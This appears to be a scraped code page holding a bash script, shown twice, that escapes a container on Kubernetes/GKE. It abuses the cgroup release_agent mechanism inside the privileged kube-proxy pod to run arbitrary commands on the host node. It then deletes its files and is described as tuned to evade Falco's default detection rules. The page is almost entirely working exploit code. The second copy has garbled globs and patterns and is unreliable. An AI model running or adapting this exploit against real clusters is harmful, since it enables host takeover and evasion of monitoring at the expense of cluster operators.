bgeesaman · March 21, 2021 00:45 · madhuakula · Jul 18, 2019 · bgeesaman · Jul 18, 2019
diff --git a/kphcme.sh b/kphcme.sh
 #!/usr/bin/env bash

 # Credit: https://twitter.com/_fel1x
 #         poc: https://twitter.com/_fel1x/status/1151487051986087936
 # Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman
 #         and to avoid detection by Falco's default rules


 read -r -d '' ESCAPE <<'EOF'
 #!/bin/sh
 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
 mkdir -p $d/w;echo 1 >$d/w/notify_on_release
 t=`sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /etc/mtab | head -n1`
 touch /tmp/o; echo $t/tmp/c >$d/release_agent;echo "#!/bin/sh
 $1 >$t/tmp/o" >/tmp/c;chmod +x /tmp/c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /tmp/o
 rm -f /tmp/o;rm -f /tmp/c;rm -f /tmp/run; rm -f /bin/kube-proxy
 EOF

 ESC_FILE="escape.sh"
 echo -n "${ESCAPE}" > "${ESC_FILE}"
 chmod +x "${ESC_FILE}"
 CMD="${1-docker ps}"
 KUBE_PROXY_POD_NAME="$(kubectl get pod -n kube-system -l 'component=kube-proxy,tier=node' -o=jsonpath='{.items[].metadata.name}')"
 kubectl cp -n kube-system "${ESC_FILE}" "${KUBE_PROXY_POD_NAME}":/tmp/run
 kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- ln -s /bin/sh /bin/kube-proxy
 kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- /bin/kube-proxy -c "/tmp/run \"$CMD\""
	#!/usr/bin/env bash

	# Credit: https://twitter.com/_fel1x
	# poc: https://twitter.com/_fel1x/status/1151487051986087936
	# Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman
	# and to avoid detection by Falco's default rules


	read -r -d '' ESCAPE <<'EOF'
	#!/bin/sh
	d=`dirname $(ls -x /s/fs/c//r \|head -n1)`
	mkdir -p $d/w;echo 1 >$d/w/notify_on_release
	t=`sed -n 's/.\upperdir=\([^,]\).*/\1/p' /etc/mtab \| head -n1`
	touch /tmp/o; echo $t/tmp/c >$d/release_agent;echo "#!/bin/sh
	$1 >$t/tmp/o" >/tmp/c;chmod +x /tmp/c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /tmp/o
	rm -f /tmp/o;rm -f /tmp/c;rm -f /tmp/run; rm -f /bin/kube-proxy
	EOF

	ESC_FILE="escape.sh"
	echo -n "${ESCAPE}" > "${ESC_FILE}"
	chmod +x "${ESC_FILE}"
	CMD="${1-docker ps}"
	KUBE_PROXY_POD_NAME="$(kubectl get pod -n kube-system -l 'component=kube-proxy,tier=node' -o=jsonpath='{.items[].metadata.name}')"
	kubectl cp -n kube-system "${ESC_FILE}" "${KUBE_PROXY_POD_NAME}":/tmp/run
	kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- ln -s /bin/sh /bin/kube-proxy
	kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- /bin/kube-proxy -c "/tmp/run \"$CMD\""